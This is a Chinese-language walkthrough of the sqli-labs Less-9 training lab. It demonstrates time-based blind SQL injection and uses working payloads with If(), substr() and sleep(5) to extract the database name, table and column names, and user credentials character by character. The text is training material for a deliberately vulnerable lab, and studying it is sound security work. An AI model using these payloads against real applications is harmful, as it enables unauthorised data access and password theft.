sqli-labs Less-9
Less-9 Get - Blind -Time based -Single Quotes
原页面
基于时间的盲注
如果是正确的直接返回,错误的时候等待5秒钟。
1.猜测数据库:
?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+
?id=1’ and If(ascii(substr(database(),1,1))=114,1,sleep(5))–+
说明第一位是s (ascii码是115)
?id=1’and If(ascii(substr(database(),2,1))=101,1,sleep(5))–+
说明第二位是e (ascii码是101)
… 以此类推,得到数据库名字是security
2.猜测security数据库的数据表:
?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101,1,sleep(5))–+
?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=100,1,sleep(5))–+ 说明第一个数据表的第一位是e,…依次类推,得到emails
?id=1’and If(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 1,1),1,1))=114,1,sleep(5))–+
(判断步骤同上)
多次尝试后得到所有的数据表emails,referers,uagents,users
3.猜测users表的列:
?id=1’and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))=105,1,sleep(5))–+
(判断步骤同上)
多次尝试,到列名是id,username,password
4.猜测username的值:
?id=1’and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))–+
(判断步骤同上)
多次尝试 得到所有的用户名和密码
- 点赞
- 收藏
- 分享
- 文章举报
- 第一次读取整个数据库(sqlilabs-LESS-1)
- SQLi-Labs 修炼手册 (Less-1-22)持续更新
- sqli-labs less 25
- SQLi-Labs 练习总结 Page-1 Less-1
- sqli-labs less-11 & less-12
- Sqli-labs less 33
- Sqli-labs less 25a
- Sqli-labs less 13
- sql注入及sqli-labs-master/Less-1题解析
- sqli-labs(Less-16——Less-20)解题过程
- sqlilabs闯关 less-1
- Sqli-labs less 62
- Sqli-labs less 48
- 通过sqli-labs学习sql注入——基础挑战之less1
- Sqli-labs less 46
- Sqli-labs less 12
- sqli-labs-less25-less25a
- sqlilabs 下的less7
- sqli-labs less-15 & less-16
- Sqli-labs less 65